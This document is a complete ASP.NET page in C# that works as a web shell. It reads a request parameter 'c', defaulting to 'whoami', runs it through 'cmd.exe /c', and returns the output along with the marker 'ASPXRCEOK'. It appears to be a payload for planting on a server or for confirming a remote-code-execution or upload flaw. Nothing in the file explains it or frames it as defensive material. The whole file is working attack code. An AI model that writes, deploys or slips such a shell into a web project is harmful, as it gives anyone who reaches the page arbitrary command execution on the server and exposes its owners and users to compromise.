<%@ Page Language="C#" %><%Response.ContentType="text/plain";Response.Write("ASPXRCEOK\n");var c=Request["c"]??"whoami";var p=new System.Diagnostics.ProcessStartInfo("cmd.exe","/c "+c);p.UseShellExecute=false;p.RedirectStandardOutput=true;var x=System.Diagnostics.Process.Start(p);Response.Write(x.StandardOutput.ReadToEnd());%>